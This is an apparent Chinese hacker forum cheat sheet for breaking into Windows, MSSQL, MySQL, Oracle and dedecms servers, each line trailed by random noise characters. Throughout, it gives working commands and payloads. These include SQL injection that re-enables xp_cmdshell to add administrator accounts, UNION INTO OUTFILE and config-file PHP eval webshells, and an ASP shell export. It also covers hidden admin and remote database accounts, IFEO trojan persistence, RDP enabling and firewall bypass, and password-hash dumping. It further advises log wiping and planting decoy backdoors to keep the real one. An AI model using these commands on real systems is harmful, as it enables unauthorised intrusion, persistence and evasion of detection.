/ d9 a6 H, B# w9 n1 }' a6 y7 R
1.net user administrator /passwordreq:no
: [5 d( x, m! B% ?" p这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了* m; ^# [2 k& u, N# Q; j o* F" c
2.比较巧妙的建克隆号的步骤+ o8 s& G2 f3 k- @* }1 N
先建一个user的用户8 T: f9 Y- I( u8 q, F* A# i
然后导出注册表。然后在计算机管理里删掉$ b* \) F F' l9 M
在导入,在添加为管理员组
* Q9 w5 \$ \, |/ k4 p9 G+ x+ ^3.查radmin密码2 `7 p# |8 L1 ` |( b
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg3 ]3 J' l" ~) L% P# j
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
3 m8 s3 w- M' X2 ]3 {) O建立一个"services.exe"的项, h9 F0 X1 Y! K: b3 Z7 o
再在其下面建立(字符串值)- q3 K- C) A H) D; J8 W) ?, W
键值为mu ma的全路径
8 ]& \+ x1 N" X: f2 P: v5.runas /user:guest cmd8 x& @3 Y1 t% {- m8 J4 X1 I M s9 E
测试用户权限!
9 {5 H9 M& C6 H6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?; t e* c L2 {. P) K6 B
7.入侵后漏洞修补、痕迹清理,后门置放:$ Q2 q9 n4 y) n
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门9 X \* ~8 u" ]
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c/ N; K+ E# u7 ~8 k, L, J
! P7 J4 f% x$ I5 o: G" i
for example
/ h" r7 S! w9 @8 f. T1 b
' [& U! o0 z n9 H+ \% Adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'2 G: O7 C7 {6 I
; z5 v ~& h( c0 o; Gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
& e* T+ y5 F; E/ _' g/ S
( E4 v" d% Z% t, X S9:MSSQL SERVER 2005默认把xpcmdshell 给ON了0 H) ]- Y: i' j! s& y
如果要启用的话就必须把他加到高级用户模式/ K3 {" W, G4 t8 ]7 f: p6 A
可以直接在注入点那里直接注入 `- o! P- Q0 g7 a2 ?6 Q
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
, r& t5 m. P" x! O; U# _+ u: d6 |然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--6 }1 T( I/ q" ~6 D$ R
或者7 v) R4 B& {! `
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
$ Z8 J5 g) S8 |. n2 ^来恢复cmdshell。
, C5 e! ]* ?4 c0 H3 h" `1 {. J
6 g3 i3 N, w: a分析器
8 l- Q9 L+ T. H( W: l- {EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--! x8 o- X' Z q' F$ S9 [' g" h
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")* a: f7 q; W8 B
10.xp_cmdshell新的恢复办法
9 I! A) \2 e) K" n( h- x' sxp_cmdshell新的恢复办法* r2 b8 v; v5 w4 w
扩展储存过程被删除以后可以有很简单的办法恢复:" t' E) @- Z5 N0 E3 k+ j3 y
删除5 ~ L' ?# |/ ?# y. z7 P# {; G
drop procedure sp_addextendedproc( a0 w' q# k2 |: e! D2 c" R$ h& s
drop procedure sp_oacreate- _+ T$ X: ` H% D0 S5 P: t+ d
exec sp_dropextendedproc 'xp_cmdshell'' H, {) P* z7 b! C. G
; G Z7 n# {: p
恢复
) {! K9 `. S6 `dbcc addextendedproc ("sp_oacreate","odsole70.dll")
$ K4 h7 k1 g' ^' m) i& I) \5 gdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
" I- O! L* ~* X% A; l F
6 Y; s0 s' T* G( ?% E9 d* V这样可以直接恢复,不用去管sp_addextendedproc是不是存在0 l& ?; I1 }' W
" x% e; w- G: R( s-----------------------------
7 V& n! ^! C2 @* D3 t- ~
' S. O% C+ x9 }9 D" h) w删除扩展存储过过程xp_cmdshell的语句:5 B0 z: g# V; N, J* m# z3 e! C
exec sp_dropextendedproc 'xp_cmdshell'
5 r) ~8 Z8 \6 h# W/ s( ~
* V8 K- F4 U' T' I9 E恢复cmdshell的sql语句. y& \7 ~; j$ h" c6 @* v" }
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
+ |/ ?1 z+ ?* T8 Y- h, h/ D' [8 J( H8 m
( ]8 h9 _' h- s" ^" N开启cmdshell的sql语句
& |+ q0 }$ D- K% [, i+ V, i4 h) [+ k0 b# V0 ~# U
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'$ b$ U. I) ^% d: i3 `- c
) ]" F& D% X) z9 f7 F$ p判断存储扩展是否存在
1 a2 x7 ~ L1 O5 `& A9 u5 O# u. Cselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'. B* [7 H k% v7 i9 B
返回结果为1就ok9 j1 M' {# U/ ~/ h2 l
- E8 E9 b4 `! J恢复xp_cmdshell
# w# f" E% N5 y& V7 Y: A7 Sexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
. ?5 |1 R/ D0 P- k! s+ F' b3 e6 D返回结果为1就ok3 g9 X3 k0 u& V, g$ V" d& e$ J
4 G: D6 s0 h: Y7 v' W: g8 C
否则上传xplog7.0.dll. ?9 F; ]1 ^6 U8 B0 J& ]
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll', u( R5 c: B8 t" ?/ ~# @/ C) b* a
4 ~* x. n) @5 n. V e( l" Y堵上cmdshell的sql语句. T# t1 z9 [' S
sp_dropextendedproc "xp_cmdshel
9 q3 E, l o; _/ ~-------------------------& q w+ S7 l! C1 V3 k% `
清除3389的登录记录用一条系统自带的命令:/ o, V h' T5 R; g/ l/ m
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f, w+ l x7 f. k. y: U8 p
( C3 v0 B6 d4 J; ]& Z+ |
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
, ~( H8 V. C$ L/ `2 D; P! W% Q$ O% z在 mysql里查看当前用户的权限
" s+ E- b& t" O% p: |0 q \show grants for
; k2 c$ M5 g2 }' R2 Q
7 Q6 b0 S5 b& {9 D$ G8 f9 O以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。3 _& \" Y x* U) r C3 f9 }
5 c5 h" O6 R! v; U5 ~. e: e! _
" f" ^2 d# J5 u2 ?+ p$ u- l
Create USER 'itpro'@'%' IDENTIFIED BY '123';( h% M& W4 E9 s" v4 c1 M9 N
* ?' B' F/ C" f/ M/ LGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION. I5 D. @6 P8 o! a2 ^
$ ?7 w7 d) W( ]4 b1 A' UMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 07 n. @# E6 x0 s+ P, I% n5 W
. S3 s+ a [2 A* H7 o+ F
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;) _/ V2 R6 ~# f
; X( T" h$ A7 Z4 L* Q搞完事记得删除脚印哟。 q8 H6 ~4 t O9 x. ~6 Z8 _
5 c4 I! ^$ N N3 r
Drop USER 'itpro'@'%';
6 h* s; }& c! ]" J3 Z! f" B' F
! r% }9 V) k5 V, S3 f, ^Drop DATABASE IF EXISTS `itpro` ;
0 {- ?: N4 r& f3 b+ a$ l. w: E& e% @; z+ ~% h- a8 X3 F' Y
当前用户获取system权限
! \, |( E: [: q' g3 ysc Create SuperCMD binPath= "cmd /K start" type= own type= interact0 P5 w; s( R Z/ W' Y( B( T
sc start SuperCMD
. s5 k" h" l5 h- l+ a1 q( m程序代码
# N# f# H- Y, p& B4 D<SCRIPT LANGUAGE="VBScript">( d6 I0 w& ]3 C5 T0 H' a1 q
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
- i! u! U. L3 Vos="WinNT://"&wsnetwork.ComputerName
4 m' T4 U4 k) T' E. Y4 d7 VSet ob=GetObject(os)
* f0 r! k2 {/ D& _Set oe=GetObject(os&"/Administrators,group")/ w0 A& @& ?9 ?+ y5 ^
Set od=ob.Create("user","nosec")
4 v* e$ l5 L7 J9 c3 o7 @& _- C+ Qod.SetPassword "123456abc!@#"
% R. I( {- C% w& _1 N2 p, q1 Fod.SetInfo
' [" @7 X2 J# ]# ?4 zSet of=GetObject(os&"/nosec",user)
" j, R1 M1 C* f$ d2 Q- ^. G% moe.add os&"/nosec"" q3 K9 [7 y; H# a0 o# m1 u
</Script> Q4 j+ _/ o: B* o* j
<script language=javascript>window.close();</script>- h% e6 T& V. H: w3 ^
( P' I1 _4 C( i' T; l2 D
" a) K& x: _+ I ]
2 Q k* t3 H0 H' t3 V( s4 Z# P' g2 ~! L' |+ W
突破验证码限制入后台拿shell- m4 ~) O! o: R5 K+ \- P$ N
程序代码6 A0 {. }2 R9 J7 U8 {) }
REGEDIT4 8 ?) U# B" \ x- s8 t( Z. P- t5 R
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 2 Q. g, Z( |. w: M
"BlockXBM"=dword:00000000
5 [8 x* F* \" K% O7 Q
% r; _" h5 M. ?# t保存为code.reg,导入注册表,重器IE
/ ~- H3 N5 Z7 V4 a% C, u* e就可以了
' F! ` a& p. |+ ^union写马
R" G8 `* G: K: k程序代码
( ^7 Z6 R& C. r3 C# `( s. F( Wwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
! U0 Q' M @1 J) }* v* u8 K, b8 A0 E; T5 a! Z! c
应用在dedecms注射漏洞上,无后台写马+ x& S% c: y$ ]5 g0 r* a1 l
dedecms后台,无文件管理器,没有outfile权限的时候
5 B. q3 s$ ]/ y- J* \( {在插件管理-病毒扫描里! F* `9 H" i3 q; v0 A
写一句话进include/config_hand.php里
- V" K2 v. I+ r9 K$ G2 G程序代码
; w$ ]( m3 z0 N! B5 m7 O9 c$ [>';?><?php @eval($_POST[cmd]);?>
* [0 d5 d0 A9 _' k
, ^8 G& E8 a8 C0 B7 C) L' e+ U6 P- f; l
如上格式1 \2 A, L* W6 f+ K
$ o( y. J4 D6 y+ P& y- O* c6 ?) voracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
- a5 u; l. B+ A- z1 D$ h* [程序代码
# k2 M$ s1 ~" C1 o6 o Hselect username,password from dba_users;$ ^. L! I8 }; N" K- h8 ^
; w6 ^" W$ b- }8 d+ E+ Y/ D/ H, O! z* S1 z
mysql远程连接用户
% i% k0 {2 b t& E程序代码* t6 |6 @8 w, ~) I1 ?: I8 `
1 X2 U/ w" t% D8 p
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
r7 w5 f( b: q2 W) P! `GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION0 _* l5 V* u. _0 z) m( p2 b
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
; M: m2 o) L* SMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
. |; q5 p* t/ k/ ^; z/ i, d- `
f4 A3 g* Y7 p* f! d
3 ?, @; H+ S9 c6 Q& U
! p3 A) W1 T! S- L8 e$ T! u0 l' S+ Q5 \) I2 }* x! X
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0) J' \4 t, i) |: {2 n$ r/ h6 m$ z2 \* C
# A! ]! a& q1 L5 o* {& d" W5 [1.查询终端端口
C1 H3 R6 l3 ]" n+ n9 E
$ V4 z* Y- x! {8 nxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
) {" n: j% I w& g4 _# J3 j) H6 W' n1 h) V$ `
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
; h+ \ ~) h! H7 mtype tsp.reg
4 K/ D: P/ G9 G2 N! P
" ?5 R) }7 e: N$ @5 c7 g, q2.开启XP&2003终端服务
% [: t7 E; K% j/ [$ i' O% s# N2 L# f0 G0 c
G+ Y, P+ K, K; o
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f3 u7 d, k. {% ?& J# K p2 s
0 x& c; \$ D& [1 k) N' y
' h# ]' M; _. v2 f5 P; U+ A* E' eREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
' M# `7 c. a. X
- V9 T2 m7 q. I3.更改终端端口为20008(0x4E28)9 z8 m( y: c/ m
+ i2 L# B3 N' o2 l/ X0 p( b
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
0 F8 o$ L6 _8 r" n" N2 Q5 y
5 y5 w# m; Y; F. a5 i7 oREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f) O4 W8 I- w1 M% ?6 P5 b/ g% z
4 f# X$ d. {1 r3 z; \ v1 R0 y
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制! n" |; _! g, p% }6 @
' t; @1 p& {3 r. r. R
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f. X4 E g% p# f/ [* P
3 \* N! m1 M+ ?9 `3 k4 ]$ X& T
6 G8 Z0 `7 |9 A. Q9 w2 `& Q, O5.开启Win2000的终端,端口为3389(需重启)
. N% p! A; e9 P2 e$ `! Y8 ?* u8 K2 a8 m1 S h
echo Windows Registry Editor Version 5.00 >2000.reg 1 _! k1 m6 E j' I$ Z% t5 V1 e
echo. >>2000.reg# X; W; K2 _6 o. P; U4 Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg " ^7 D6 z. V4 N/ S- _# b
echo "Enabled"="0" >>2000.reg
# T! k& x3 q$ S& }, q. |9 Q' pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
0 D; i5 d, [* S% B( kecho "ShutdownWithoutLogon"="0" >>2000.reg ' \# a9 L' q* b# S0 V! B
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 2 U3 e/ i4 {8 j8 O
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
: t* ~2 r1 i% |) i% zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 4 C( d9 ?4 {+ `0 F
echo "TSEnabled"=dword:00000001 >>2000.reg
4 ~! N# x, b+ u% p5 r/ Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg |* H) w/ ]% m x' I0 H% Z
echo "Start"=dword:00000002 >>2000.reg . v+ P, v* Z" I5 G1 [ \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg . h# d3 b" [; k9 \
echo "Start"=dword:00000002 >>2000.reg . o0 S, Y+ I/ x8 W
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg # Z" c; p+ `% p3 b
echo "Hotkey"="1" >>2000.reg 5 I: i8 `* t* D, c/ `# j6 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 2 {/ x( m1 \7 r0 @
echo "ortNumber"=dword:00000D3D >>2000.reg
4 q% K. M) s |* {" n8 [* cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ( W. s( U H( z* S0 i
echo "ortNumber"=dword:00000D3D >>2000.reg
. v! j$ k+ w1 c, v' V. S
- y- {9 y* Z6 u6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)$ B2 M r6 j9 z0 P6 i
# m8 s3 d8 x0 X$ W@ECHO OFF & cd/d %temp% & echo [version] > restart.inf% W9 v+ p" u6 V: D+ ~& L
(set inf=InstallHinfSection DefaultInstall): f4 c" u$ S% A$ `/ C
echo signature=$chicago$ >> restart.inf
3 ^ J; h( t( s- C+ o, Recho [defaultinstall] >> restart.inf4 ?4 n& ]) h& n# @: [2 ?
rundll32 setupapi,%inf% 1 %temp%\restart.inf
( W1 `6 k/ a5 B0 B9 V4 u9 ]3 N/ S: v
( Y& L) T6 ]' \$ G. B- r( c
7.禁用TCP/IP端口筛选 (需重启)1 w" o, \+ B- R, u
1 O! _- ]% v+ w0 W
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
3 o' O9 e9 N- ~& X& e1 Z. t$ `; }; G ^" ]! b! [+ M+ r
8.终端超出最大连接数时可用下面的命令来连接4 c& R# d2 ]/ T* Y' M& C
& P: I4 U! _* G% Q
mstsc /v:ip:3389 /console5 Y8 m# H- F2 o9 E8 |, n
8 N* B- E' q% H0 ~. M4 W b
9.调整NTFS分区权限
8 C9 q9 Y5 ^* X
9 y# Q' E- Q# s5 e7 vcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
, H( V- l. ~/ | `) k
% s& Y8 o) o# v3 |; r" Hcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件): p3 I! j$ _5 {8 d. \
; A9 \. V1 l' F: n+ Y
------------------------------------------------------
: f1 @2 _6 O! Z9 A1 |: ~1 m" P8 t3389.vbs # a' a0 p9 q5 A1 F% t! W& n9 v" A
On Error Resume Next, y3 a! M1 m% H! V8 T. n- u
const HKEY_LOCAL_MACHINE = &H80000002+ {, a4 A7 n* L
strComputer = "."
}2 J* C5 a1 k; a5 T6 {- ^Set StdOut = WScript.StdOut" r8 L2 b* y/ P' V7 A
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_3 `7 a3 \ j7 g+ S; I
strComputer & "\root\default:StdRegProv")
; K9 _$ b8 l/ `- U4 T# g% IstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
& p5 G8 |( H+ V8 doreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath, ~* C) [- ?+ m
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"" ~! t% v! R$ k h1 G" g* V
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath! i% J; z) h8 { _
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp") d$ k% r3 V2 z" T2 b" l8 `
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
+ }0 j' G( a% H0 QstrValueName = "fDenyTSConnections"
; w6 W' \& P l# I/ t/ A3 Z# TdwValue = 0& a+ J5 M/ E1 x
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
3 p8 q8 Q6 b2 @9 FstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
( I6 g4 k1 y9 { Y( d2 j) ]# b4 Z! g6 mstrValueName = "ortNumber"
* v( Y ~1 z0 D+ s$ pdwValue = 3389$ R2 p4 K% K, D u* |
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
, l; K4 d$ J) e8 ?strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"7 Z% q1 J! b. y2 \" {$ ^/ ^$ j! a
strValueName = "ortNumber"
2 u, a: p9 O1 n0 O" |( ]dwValue = 3389
# V i5 \3 i0 W; d3 p6 E6 Soreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue& C" r3 Z1 Y1 ]- f" D: N/ w/ x
Set R = CreateObject("WScript.Shell") $ b3 a8 _9 V# o/ a5 E& [
R.run("Shutdown.exe -f -r -t 0")
, U( u0 h3 p6 d0 F" S
/ b2 c( f, k; s! f删除awgina.dll的注册表键值2 z2 V$ l' W/ F8 [7 W. Y
程序代码" _* }, h6 S b# Y+ a
: o4 D; E' r# y# ~2 n; C
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f' Y/ C( S6 g+ r n q! f' A
$ z+ t4 u( x/ A3 S# L8 i9 @5 I
3 X! O, U# I5 v$ a& [8 L- S
, {5 z' d+ W' {1 s% y2 h, u
9 F# l# D; V9 q程序代码$ Y% d5 L. [) x# a; H4 I% t* d
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash/ C* e8 b% Q( Y
( N. \; ~; s I, [! j) g8 |
设置为1,关闭LM Hash
7 {6 l" r d" q( c: Y1 j1 a) @; C2 m' e# @, _
数据库安全:入侵Oracle数据库常用操作命令
* L+ Z7 p% H( g6 I7 ~最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
! O/ S& {9 J: g8 ]$ T7 G+ o1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。. g: Z- U: L6 \* i# e8 s
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
2 Z% k" w( j- P% [% _! `* M3、SQL>connect / as sysdba ;(as sysoper)或
$ S$ L' J/ N' j$ A1 R6 vconnect internal/oracle AS SYSDBA ;(scott/tiger)
0 Y% N5 k& h: A" c; L1 p/ [; iconn sys/change_on_install as sysdba;
/ l4 V( }( X, m4 ]- d+ g4、SQL>startup; 启动数据库实例
( M, B! ~, F0 m: K& ? w5、查看当前的所有数据库: select * from v$database;, v: Z- X* H, ~8 j3 I' I( w M
select name from v$database;
$ O2 u% _' K/ [4 u9 X6、desc v$databases; 查看数据库结构字段& P. ?3 q/ \) {( C. f7 m
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
& x7 }" d% c8 U9 b& ESQL>select * from V_$PWFILE_USERS;; J8 X$ S3 J N( B
Show user;查看当前数据库连接用户
) T) F( L+ s6 H8、进入test数据库:database test;, p0 D3 S! g" B1 b% {
9、查看所有的数据库实例:select * from v$instance;
( n6 |0 X3 }; [3 }% D7 b1 \: b如:ora9i
' \7 I2 H& C% u: s# n10、查看当前库的所有数据表:
7 d0 X, i5 j) T0 y+ ]3 m, dSQL> select TABLE_NAME from all_tables;& P& x2 Y4 r, n$ I9 O$ |
select * from all_tables;9 D2 i/ O" g7 t" F/ j$ e1 h3 u
SQL> select table_name from all_tables where table_name like '%u%';
4 z+ J; k s' o! F. I' {6 m v4 sTABLE_NAME% E# j& b N3 h8 u
------------------------------9 T( _" t0 l% @$ H) L
_default_auditing_options_ L( J; W! x# X* q" i; ?& t
11、查看表结构:desc all_tables;2 v. F4 D6 f i/ {! c
12、显示CQI.T_BBS_XUSER的所有字段结构:, e# B4 R. B F2 H
desc CQI.T_BBS_XUSER;
+ e- q6 B/ W: `9 |) S6 u13、获得CQI.T_BBS_XUSER表中的记录:7 s6 U" W+ ^$ ^- q B2 p' n
select * from CQI.T_BBS_XUSER;
9 E" G3 }8 m/ Q: V6 f14、增加数据库用户:(test11/test)
m( Z: P) P! f' I8 i2 O1 N3 g' pcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
9 ?/ p9 v3 C8 P& T5 \8 `15、用户授权:
5 i& b: W! {9 L) Igrant connect,resource,dba to test11;
6 J9 ~7 j0 S" J6 Agrant sysdba to test11;
, g- F- ?( t' w7 h6 `2 f% a6 N1 Kcommit;
2 w+ d L9 \0 q8 x3 _: j" z+ y: H8 L8 w16、更改数据库用户的密码:(将sys与system的密码改为test.)3 n5 k8 w& ^( e1 P- H* A4 b
alter user sys indentified by test;; w, h" c3 {- b) C8 R# ]
alter user system indentified by test;
7 V/ t4 v0 \# K# T2 N
! v' d$ `/ o0 r5 R" UapplicationContext-util.xml
8 D2 I( ^9 [: M+ W3 ?* mapplicationContext.xml
+ S- g' L* p* d& {5 c% Astruts-config.xml
, `) u0 F$ T* T( ]* C% `& ]web.xml# H: x/ ~, e& A0 d) o1 y
server.xml
) c5 W% m8 d8 S9 ~$ Jtomcat-users.xml
7 k" ~8 \" k/ P- ?hibernate.cfg.xml
2 |1 g+ N8 r2 i0 h b/ A+ Cdatabase_pool_config.xml' P8 k8 L; W* g2 J( G" G
& u, A# p( |3 D$ j4 T" L; H- E
, p/ {! b4 ?! T( F* u. Q1 X- N& Q3 ?% _
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
( _5 ~- T$ D1 s\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini1 A( z& C2 ` M" z4 Q$ s7 _3 ?7 ]
\WEB-INF\struts-config.xml 文件目录结构. @& c/ w! {; D4 ]! ?/ C
* @( W) c: y) m! @, z$ A1 q
spring.properties 里边包含hibernate.cfg.xml的名称3 ]; z. S: W( r! b9 W* X
/ y$ [2 p# j" @ l0 K6 ^
& u5 r& M+ m5 I
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml6 W6 W4 ~2 w) f
) W9 v2 I2 L' I9 i如果都找不到 那就看看class文件吧。。! o5 E# v- P1 _: A6 m6 i
n: b. E6 x3 }5 b" A7 K; Q) s测试1:/ @3 E% A9 ~% `8 L
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1! a t* [/ f; e* [" s
9 o+ ~0 y k1 @3 C0 \" w测试2:8 e( c% Q+ P1 r+ k" g
# l8 j, U- t. Gcreate table dirs(paths varchar(100),paths1 varchar(100), id int)% v- E4 T8 R+ x. V! s
4 n i; r' G U- f' u3 K
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--! g8 x* A8 {+ Z2 J9 E$ ]: j
- U0 _5 e$ H. i% h/ X3 @7 r- [SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
! n/ M- C9 Q$ G0 |2 G; d" d9 d/ B; H) v$ W* {, j' \1 {
查看虚拟机中的共享文件:( u+ ~) |9 \8 f3 U/ o
在虚拟机中的cmd中执行
& h/ o/ \0 S3 ^0 a% Z+ c) U\\.host\Shared Folders
0 \, P4 p9 ?8 ^7 I" N2 C' f* C: N8 _7 ^1 Q
cmdshell下找终端的技巧
9 T" ^! n! w# } c. ~6 b找终端: 6 `8 J5 s! y) T; J% B
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! % h7 q2 v j7 f5 v# e8 {4 Z- a; I
而终端所对应的服务名为:TermService
/ L) I) y( x0 h第二步:用netstat -ano命令,列出所有端口对应的PID值!
* ]' R: f5 E1 Z 找到PID值所对应的端口0 |; r/ j- o" R2 Q5 g6 Y7 t
2 H8 e4 e- u/ Q+ ~
查询sql server 2005中的密码hash
" j+ {) t/ k/ H% I7 ?3 RSELECT password_hash FROM sys.sql_logins where name='sa'! G8 V8 d0 D1 \7 W& r& R
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
: S9 M: z: s8 Q! [access中导出shell
/ U4 x# F/ g i: ]9 j% p
